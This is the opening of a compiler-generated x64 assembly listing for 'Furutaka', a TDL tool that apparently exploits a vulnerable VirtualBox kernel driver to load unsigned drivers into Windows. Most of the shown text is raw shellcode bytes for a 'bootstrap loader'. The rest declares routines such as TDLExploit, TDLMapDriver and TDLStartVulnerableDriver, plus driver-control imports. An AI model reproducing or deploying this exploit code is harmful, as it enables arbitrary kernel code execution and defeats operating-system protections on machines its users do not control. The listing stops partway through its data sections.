nopriest
/
TDL
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
TDL/Source/Furutaka/output/x64/Release/asmlist/main.asm

3425 lines
106 KiB
NASM
Raw Permalink Blame History

; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
include listing.inc
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC TDLBootstrapLoader_code
PUBLIC g_lApplicationInstances
PUBLIC g_hVBox
PUBLIC g_VBoxInstalled
PUBLIC g_NtBuildNumber
_DATA SEGMENT
COMM g_hInstance:QWORD
_DATA ENDS
_BSS SEGMENT
g_VBoxInstalled DD 01H DUP (?)
g_NtBuildNumber DD 01H DUP (?)
_BSS ENDS
_DATA SEGMENT
g_hVBox DQ ffffffffffffffffH
_DATA ENDS
shrd SEGMENT
g_lApplicationInstances DD 00H
shrd ENDS
CONST SEGMENT
TDLBootstrapLoader_code DB 048H
DB 08bH
DB 0c4H
DB 041H
DB 054H
DB 048H
DB 081H
DB 0ecH
DB 090H
DB 00H
DB 00H
DB 00H
DB 048H
DB 089H
DB 058H
DB 010H
DB 04dH
DB 08bH
DB 0e0H
DB 048H
DB 089H
DB 068H
DB 018H
DB 048H
DB 08dH
DB 01dH
DB 0e2H
DB 0ffH
DB 0ffH
DB 0ffH
DB 04cH
DB 089H
DB 068H
DB 0e8H
DB 048H
DB 081H
DB 0c3H
DB 00H
DB 03H
DB 00H
DB 00H
DB 04cH
DB 089H
DB 070H
DB 0e0H
DB 04cH
DB 08bH
DB 0eaH
DB 04cH
DB 089H
DB 078H
DB 0d8H
DB 04cH
DB 08bH
DB 0c9H
DB 033H
DB 0c9H
DB 041H
DB 0b8H
DB 054H
DB 064H
DB 06cH
DB 053H
DB 04cH
DB 063H
DB 073H
DB 03cH
DB 04cH
DB 03H
DB 0f3H
DB 045H
DB 08bH
DB 07eH
DB 050H
DB 041H
DB 08dH
DB 097H
DB 00H
DB 010H
DB 00H
DB 00H
DB 041H
DB 0ffH
DB 0d1H
DB 045H
DB 033H
DB 0c9H
DB 048H
DB 08dH
DB 0a8H
DB 00H
DB 010H
DB 00H
DB 00H
DB 048H
DB 081H
DB 0e5H
DB 00H
DB 0f0H
DB 0ffH
DB 0ffH
DB 041H
DB 083H
DB 0beH
DB 084H
DB 00H
DB 00H
DB 00H
DB 05H
DB 0fH
DB 086H
DB 0b0H
DB 00H
DB 00H
DB 00H
DB 041H
DB 08bH
DB 08eH
DB 0b0H
DB 00H
DB 00H
DB 00H
DB 085H
DB 0c9H
DB 0fH
DB 084H
DB 0a1H
DB 00H
DB 00H
DB 00H
DB 048H
DB 089H
DB 0b4H
DB 024H
DB 0b8H
DB 00H
DB 00H
DB 00H
DB 04cH
DB 08dH
DB 04H
DB 0bH
DB 041H
DB 08bH
DB 0b6H
DB 0b4H
DB 00H
DB 00H
DB 00H
DB 04cH
DB 08bH
DB 0ddH
DB 04dH
DB 02bH
DB 05eH
DB 030H
DB 048H
DB 089H
DB 0bcH
DB 024H
DB 088H
DB 00H
DB 00H
DB 00H
DB 041H
DB 08bH
DB 0f9H
DB 085H
DB 0f6H
DB 074H
DB 068H
DB 0fH
DB 01fH
DB 044H
DB 00H
DB 00H
DB 041H
DB 0b9H
DB 08H
DB 00H
DB 00H
DB 00H
DB 04dH
DB 08dH
DB 050H
DB 08H
DB 045H
DB 039H
DB 048H
DB 04H
DB 076H
DB 043H
DB 041H
DB 0fH
DB 0b7H
DB 02H
DB 08bH
DB 0c8H
DB 0c1H
DB 0e9H
DB 0cH
DB 083H
DB 0f9H
DB 03H
DB 074H
DB 017H
DB 083H
DB 0f9H
DB 0aH
DB 075H
DB 022H
DB 041H
DB 08bH
DB 010H
DB 025H
DB 0ffH
DB 0fH
DB 00H
DB 00H
DB 048H
DB 08dH
DB 0cH
DB 03H
DB 04cH
DB 01H
DB 01cH
DB 0aH
DB 0ebH
DB 010H
DB 041H
DB 08bH
DB 010H
DB 025H
DB 0ffH
DB 0fH
DB 00H
DB 00H
DB 048H
DB 08dH
DB 0cH
DB 03H
DB 044H
DB 01H
DB 01cH
DB 0aH
DB 049H
DB 083H
DB 0c2H
DB 02H
DB 041H
DB 083H
DB 0c1H
DB 02H
DB 045H
DB 03bH
DB 048H
DB 04H
DB 072H
DB 0bdH
DB 041H
DB 08bH
DB 040H
DB 04H
DB 03H
DB 0f8H
DB 04cH
DB 03H
DB 0c0H
DB 03bH
DB 0feH
DB 072H
DB 0a0H
DB 045H
DB 033H
DB 0c9H
DB 048H
DB 08bH
DB 0b4H
DB 024H
DB 0b8H
DB 00H
DB 00H
DB 00H
DB 048H
DB 08bH
DB 0bcH
DB 024H
DB 088H
DB 00H
DB 00H
DB 00H
DB 049H
DB 08bH
DB 0d7H
DB 04cH
DB 08bH
DB 07cH
DB 024H
DB 070H
DB 048H
DB 0c1H
DB 0eaH
DB 03H
DB 048H
DB 085H
DB 0d2H
DB 074H
DB 01dH
DB 048H
DB 08bH
DB 0cdH
DB 048H
DB 02bH
DB 0ddH
DB 066H
DB 0fH
DB 01fH
DB 044H
DB 00H
DB 00H
DB 048H
DB 08bH
DB 04H
DB 0bH
DB 048H
DB 089H
DB 01H
DB 048H
DB 08dH
DB 049H
DB 08H
DB 048H
DB 083H
DB 0eaH
DB 01H
DB 075H
DB 0efH
DB 04cH
DB 089H
DB 04cH
DB 024H
DB 030H
DB 04cH
DB 08dH
DB 044H
DB 024H
DB 040H
DB 04cH
DB 089H
DB 08cH
DB 024H
DB 0a0H
DB 00H
DB 00H
DB 00H
DB 048H
DB 08dH
DB 08cH
DB 024H
DB 0a0H
DB 00H
DB 00H
DB 00H
DB 04cH
DB 089H
DB 04cH
DB 024H
DB 048H
DB 0fH
DB 057H
DB 0c0H
DB 04cH
DB 089H
DB 04cH
DB 024H
DB 050H
DB 0baH
DB 0ffH
DB 0ffH
DB 01fH
DB 00H
DB 0f3H
DB 0fH
DB 07fH
DB 044H
DB 024H
DB 060H
DB 0c7H
DB 044H
DB 024H
DB 040H
DB 030H
DB 00H
DB 00H
DB 00H
DB 0c7H
DB 044H
DB 024H
DB 058H
DB 00H
DB 02H
DB 00H
DB 00H
DB 041H
DB 08bH
DB 046H
DB 028H
DB 048H
DB 03H
DB 0c5H
DB 048H
DB 089H
DB 044H
DB 024H
DB 028H
DB 04cH
DB 089H
DB 04cH
DB 024H
DB 020H
DB 045H
DB 033H
DB 0c9H
DB 041H
DB 0ffH
DB 0d5H
DB 04cH
DB 08bH
DB 074H
DB 024H
DB 078H
DB 04cH
DB 08bH
DB 0acH
DB 024H
DB 080H
DB 00H
DB 00H
DB 00H
DB 048H
DB 08bH
DB 0acH
DB 024H
DB 0b0H
DB 00H
DB 00H
DB 00H
DB 048H
DB 08bH
DB 09cH
DB 024H
DB 0a8H
DB 00H
DB 00H
DB 00H
DB 085H
DB 0c0H
DB 078H
DB 0bH
DB 048H
DB 08bH
DB 08cH
DB 024H
DB 0a0H
DB 00H
DB 00H
DB 00H
DB 041H
DB 0ffH
DB 0d4H
DB 048H
DB 081H
DB 0c4H
DB 090H
DB 00H
DB 00H
DB 00H
DB 041H
DB 05cH
DB 0c3H
TDLBootstrapLoader_code_w10rs2 DB 040H
DB 053H
DB 055H
DB 056H
DB 048H
DB 083H
DB 0ecH
DB 020H
DB 04cH
DB 08bH
DB 0c9H
DB 04cH
DB 089H
DB 07cH
DB 024H
DB 050H
DB 048H
DB 08dH
DB 01dH
DB 0e9H
DB 0ffH
DB 0ffH
DB 0ffH
DB 033H
DB 0c9H
DB 048H
DB 081H
DB 0c3H
DB 00H
DB 03H
DB 00H
DB 00H
DB 041H
DB 0b8H
DB 054H
DB 064H
DB 06cH
DB 053H
DB 048H
DB 063H
DB 06bH
DB 03cH
DB 048H
DB 03H
DB 0ebH
DB 044H
DB 08bH
DB 07dH
DB 050H
DB 041H
DB 08dH
DB 097H
DB 00H
DB 010H
DB 00H
DB 00H
DB 041H
DB 0ffH
DB 0d1H
DB 048H
DB 08dH
DB 0b0H
DB 00H
DB 010H
DB 00H
DB 00H
DB 048H
DB 081H
DB 0e6H
DB 00H
DB 0f0H
DB 0ffH
DB 0ffH
DB 083H
DB 0bdH
DB 084H
DB 00H
DB 00H
DB 00H
DB 05H
DB 0fH
DB 086H
DB 0a5H
DB 00H
DB 00H
DB 00H
DB 08bH
DB 08dH
DB 0b0H
DB 00H
DB 00H
DB 00H
DB 085H
DB 0c9H
DB 0fH
DB 084H
DB 097H
DB 00H
DB 00H
DB 00H
DB 048H
DB 089H
DB 07cH
DB 024H
DB 040H
DB 04cH
DB 08dH
DB 04H
DB 0bH
DB 04cH
DB 08bH
DB 0deH
DB 04cH
DB 089H
DB 074H
DB 024H
DB 048H
DB 04cH
DB 02bH
DB 05dH
DB 030H
DB 033H
DB 0ffH
DB 044H
DB 08bH
DB 0b5H
DB 0b4H
DB 00H
DB 00H
DB 00H
DB 045H
DB 085H
DB 0f6H
DB 074H
DB 06aH
DB 066H
DB 0fH
DB 01fH
DB 084H
DB 00H
DB 00H
DB 00H
DB 00H
DB 00H
DB 041H
DB 0b9H
DB 08H
DB 00H
DB 00H
DB 00H
DB 04dH
DB 08dH
DB 050H
DB 08H
DB 045H
DB 039H
DB 048H
DB 04H
DB 076H
DB 043H
DB 041H
DB 0fH
DB 0b7H
DB 02H
DB 08bH
DB 0c8H
DB 0c1H
DB 0e9H
DB 0cH
DB 083H
DB 0f9H
DB 03H
DB 074H
DB 017H
DB 083H
DB 0f9H
DB 0aH
DB 075H
DB 022H
DB 041H
DB 08bH
DB 010H
DB 025H
DB 0ffH
DB 0fH
DB 00H
DB 00H
DB 048H
DB 08dH
DB 0cH
DB 03H
DB 04cH
DB 01H
DB 01cH
DB 0aH
DB 0ebH
DB 010H
DB 041H
DB 08bH
DB 010H
DB 025H
DB 0ffH
DB 0fH
DB 00H
DB 00H
DB 048H
DB 08dH
DB 0cH
DB 03H
DB 044H
DB 01H
DB 01cH
DB 0aH
DB 049H
DB 083H
DB 0c2H
DB 02H
DB 041H
DB 083H
DB 0c1H
DB 02H
DB 045H
DB 03bH
DB 048H
DB 04H
DB 072H
DB 0bdH
DB 041H
DB 08bH
DB 040H
DB 04H
DB 03H
DB 0f8H
DB 04cH
DB 03H
DB 0c0H
DB 041H
DB 03bH
DB 0feH
DB 072H
DB 09fH
DB 048H
DB 08bH
DB 07cH
DB 024H
DB 040H
DB 04cH
DB 08bH
DB 074H
DB 024H
DB 048H
DB 049H
DB 08bH
DB 0d7H
DB 04cH
DB 08bH
DB 07cH
DB 024H
DB 050H
DB 048H
DB 0c1H
DB 0eaH
DB 03H
DB 048H
DB 085H
DB 0d2H
DB 074H
DB 025H
DB 048H
DB 08bH
DB 0ceH
DB 048H
DB 02bH
DB 0deH
DB 0fH
DB 01fH
DB 040H
DB 00H
DB 066H
DB 066H
DB 0fH
DB 01fH
DB 084H
DB 00H
DB 00H
DB 00H
DB 00H
DB 00H
DB 048H
DB 08bH
DB 04H
DB 0bH
DB 048H
DB 089H
DB 01H
DB 048H
DB 08dH
DB 049H
DB 08H
DB 048H
DB 083H
DB 0eaH
DB 01H
DB 075H
DB 0efH
DB 08bH
DB 045H
DB 028H
DB 048H
DB 03H
DB 0c6H
DB 048H
DB 083H
DB 0c4H
DB 020H
DB 05eH
DB 05dH
DB 05bH
DB 048H
DB 0ffH
DB 0e0H
CONST ENDS
PUBLIC TDLVBoxInstalled
PUBLIC TDLGetProcAddress
PUBLIC TDLResolveKernelImport
PUBLIC TDLExploit
PUBLIC TDLMapDriver
PUBLIC TDLStartVulnerableDriver
PUBLIC TDLStopVulnerableDriver
PUBLIC TDLProcessCommandLine
PUBLIC TDLMain
PUBLIC ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; `string'
PUBLIC ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_08EFILHJLF@furutaka@ ; `string'
PUBLIC ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ ; `string'
PUBLIC ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ ; `string'
PUBLIC ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ ; `string'
PUBLIC ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
PUBLIC ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ ; `string'
PUBLIC ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
PUBLIC ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ ; `string'
PUBLIC ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ ; `string'
PUBLIC ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ ; `string'
PUBLIC ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
PUBLIC ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ ; `string'
PUBLIC ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ ; `string'
PUBLIC ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; `string'
PUBLIC ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ ; `string'
PUBLIC ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ ; `string'
PUBLIC ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; `string'
PUBLIC ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ ; `string'
PUBLIC ??_C@_07IPICGNAN@ZwClose@ ; `string'
PUBLIC ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; `string'
PUBLIC ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ ; `string'
PUBLIC ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; `string'
PUBLIC ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ ; `string'
PUBLIC ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ ; `string'
PUBLIC ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ ; `string'
PUBLIC ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ ; `string'
PUBLIC ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ ; `string'
PUBLIC ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; `string'
PUBLIC ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; `string'
PUBLIC ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ ; `string'
PUBLIC ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ ; `string'
PUBLIC ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ ; `string'
PUBLIC ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ ; `string'
PUBLIC ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
PUBLIC ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ ; `string'
PUBLIC ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
PUBLIC ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ ; `string'
PUBLIC ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
PUBLIC ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
PUBLIC ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
PUBLIC ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ ; `string'
PUBLIC ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ ; `string'
PUBLIC ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; `string'
PUBLIC ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ ; `string'
PUBLIC ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ ; `string'
PUBLIC ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ ; `string'
PUBLIC ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string'
PUBLIC ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ ; `string'
PUBLIC ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string'
PUBLIC ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ ; `string'
PUBLIC ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ ; `string'
PUBLIC ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string'
PUBLIC ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ ; `string'
PUBLIC ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string'
PUBLIC ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ ; `string'
PUBLIC ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
PUBLIC ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
PUBLIC ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ ; `string'
PUBLIC ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ ; `string'
PUBLIC ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ ; `string'
PUBLIC ??_C@_13JOFGPIOO@?$AA?4@ ; `string'
PUBLIC ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ ; `string'
PUBLIC ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ ; `string'
EXTRN __imp_GetCommandLineW:PROC
EXTRN __imp_GetFileAttributesW:PROC
EXTRN __imp_CloseHandle:PROC
EXTRN __imp_DeviceIoControl:PROC
EXTRN __imp_Sleep:PROC
EXTRN __imp_ExitProcess:PROC
EXTRN __imp_GetSystemDirectoryW:PROC
EXTRN __imp_GetModuleHandleW:PROC
EXTRN __imp_SetConsoleTitleW:PROC
EXTRN __imp_RegCloseKey:PROC
EXTRN __imp_RegOpenKeyExW:PROC
EXTRN __imp_CloseServiceHandle:PROC
EXTRN __imp_OpenSCManagerW:PROC
EXTRN __imp_LdrGetProcedureAddress:PROC
EXTRN __imp_LdrLoadDll:PROC
EXTRN __imp_RtlInitString:PROC
EXTRN __imp_RtlInitUnicodeString:PROC
EXTRN __imp_RtlGetVersion:PROC
EXTRN __imp_RtlImageNtHeader:PROC
EXTRN __imp_NtDeleteFile:PROC
EXTRN __imp_NtAllocateVirtualMemory:PROC
EXTRN __imp_NtFreeVirtualMemory:PROC
EXTRN _strend_w:PROC
EXTRN _strcpy_w:PROC
EXTRN _strcat_w:PROC
EXTRN ultostr_w:PROC
EXTRN ultohex_w:PROC
EXTRN u64tohex_w:PROC
EXTRN GetCommandLineParamW:PROC
EXTRN supGetNtOsBase:PROC
EXTRN supQueryResourceData:PROC
EXTRN supBackupVBoxDrv:PROC
EXTRN supWriteBufferToFile:PROC
EXTRN supIsObjectExists:PROC
EXTRN supStopVBoxService:PROC
EXTRN cuiInitialize:PROC
EXTRN cuiPrintTextW:PROC
EXTRN scmInstallDriver:PROC
EXTRN scmStartDriver:PROC
EXTRN scmOpenDevice:PROC
EXTRN scmStopDriver:PROC
EXTRN scmRemoveDriver:PROC
EXTRN memcpy:PROC
; COMDAT pdata
pdata SEGMENT
$pdata$RtlSecureZeroMemory DD imagerel $LN4
DD imagerel $LN4+27
DD imagerel $unwind$RtlSecureZeroMemory
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLVBoxInstalled DD imagerel $LN5
DD imagerel $LN5+83
DD imagerel $unwind$TDLVBoxInstalled
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLGetProcAddress DD imagerel $LN5
DD imagerel $LN5+88
DD imagerel $unwind$TDLGetProcAddress
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLResolveKernelImport DD imagerel $LN19
DD imagerel $LN19+167
DD imagerel $unwind$TDLResolveKernelImport
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLExploit DD imagerel $LN26
DD imagerel $LN26+1256
DD imagerel $unwind$TDLExploit
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLMapDriver DD imagerel $LN35
